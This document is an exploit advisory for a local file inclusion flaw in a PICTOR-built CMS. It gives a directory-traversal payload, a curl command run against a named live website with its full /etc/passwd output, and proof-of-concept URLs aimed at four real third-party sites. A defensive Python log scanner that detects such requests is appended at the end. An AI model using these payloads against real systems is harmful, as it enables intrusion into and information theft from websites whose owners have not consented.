[+] Local File Inclusion on CMS NETGEAR powered by PICTOR
[+] Date: 14/12/2016
[+] Risk: Medium
[+] CWE number: CWE-98
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.pictor.com.br/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: GNU/Linux
[+] Vulnerable File: index.php
[+] Exploit :
http://host/index.php?pag= [ Local File Inclusion ]
[+] Payload :
"../../../../../../../../../../../../../etc/passwd"
[+] Example :
felipe@andrian # echo "Local File Inclusion:";curl -s "http://acervocbncuritiba.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00" | grep :x
Local File Inclusion:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
avahi-autoipd:x:499:499:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
vcsa:x:69:498:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:498:497:RealtimeKit:/proc:/sbin/nologin
abrt:x:497:495::/etc/abrt:/sbin/nologin
nscd:x:28:494:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:496:491:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
haldaemon:x:68:490:HAL daemon:/:/sbin/nologin
openvpn:x:495:489:OpenVPN:/etc/openvpn:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:488:Apache:/var/www:/sbin/nologin
saslauth:x:494:487:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:486::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:485::/var/spool/mqueue:/sbin/nologin
nm-openconnect:x:493:484:NetworkManager user for OpenConnect:/:/sbin/nologin
sshd:x:74:483:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
smolt:x:492:482:Smolt:/usr/share/smolt:/sbin/nologin
pulse:x:491:481:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:479::/var/lib/gdm:/sbin/nologin
pictor:x:500:500:Pictor Desenvolvimento:/home/pictor:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
webalizer:x:67:478:Webalizer:/var/www/usage:/sbin/nologin
[+] PoC :
http://acervocbncuritiba.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00
http://tecnopisos.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00
http://www.lucaldasbijoux.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00
http://qualysul.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00
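A defender-side check for the pattern above, added here as an example and not part of the original advisory: it scans Apache access-log lines (constructed samples, not real traffic) for `pag` values carrying traversal, a null byte or an absolute path, percent-decoding repeatedly so double encoding is caught. The page directory `/pages/` is an assumption about where the CMS loads page files from.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (Apache combined format); the second mirrors the advisory's payload.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Dec/2016:10:01:02 -0200] "GET /index.php?pag=contato HTTP/1.1" 200 5120
203.0.113.9 - - [14/Dec/2016:10:01:07 -0200] "GET /index.php?pag=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1812
203.0.113.9 - - [14/Dec/2016:10:01:09 -0200] "GET /index.php?pag=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1812
203.0.113.9 - - [14/Dec/2016:10:01:11 -0200] "GET /index.php?pag=%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 1812
203.0.113.9 - - [14/Dec/2016:10:01:13 -0200] "GET /index.php?pag=/etc/passwd HTTP/1.1" 200 1812
198.51.100.2 - - [14/Dec/2016:10:02:00 -0200] "GET /index.php?pag=sobre HTTP/1.1" 200 4090
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
PAGE_DIR = "/pages/"   # assumed directory the CMS includes page files from

def decode_fully(value):
    """Percent-decode until stable so double-encoded traversal (%252e) is caught."""
    while (decoded := unquote(value)) != value:
        value = decoded
    return value

def classify_pag(raw):
    """Return the reasons a `pag` value looks like an LFI attempt ([] if benign)."""
    value = decode_fully(raw).replace("\\", "/")
    reasons = []
    if "\x00" in value:
        reasons.append("null byte")          # truncates a suffix the script appends
    if value.startswith("/"):
        reasons.append("absolute path")
    if ".." in value.split("/"):
        reasons.append("directory traversal")
    # Resolve what the include would open (up to the null byte) and check it stays in PAGE_DIR
    resolved = posixpath.normpath(PAGE_DIR + value.split("\x00")[0])
    if not resolved.startswith(PAGE_DIR):
        reasons.append("resolves outside page dir: " + resolved)
    return reasons

def scan_log(text):
    """Return (client ip, decoded pag value, reasons) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for key, val in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
            if key == "pag" and (reasons := classify_pag(val)):
                findings.append((m["ip"], val, reasons))
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags the four requests from 203.0.113.9 and leaves the two ordinary page names alone.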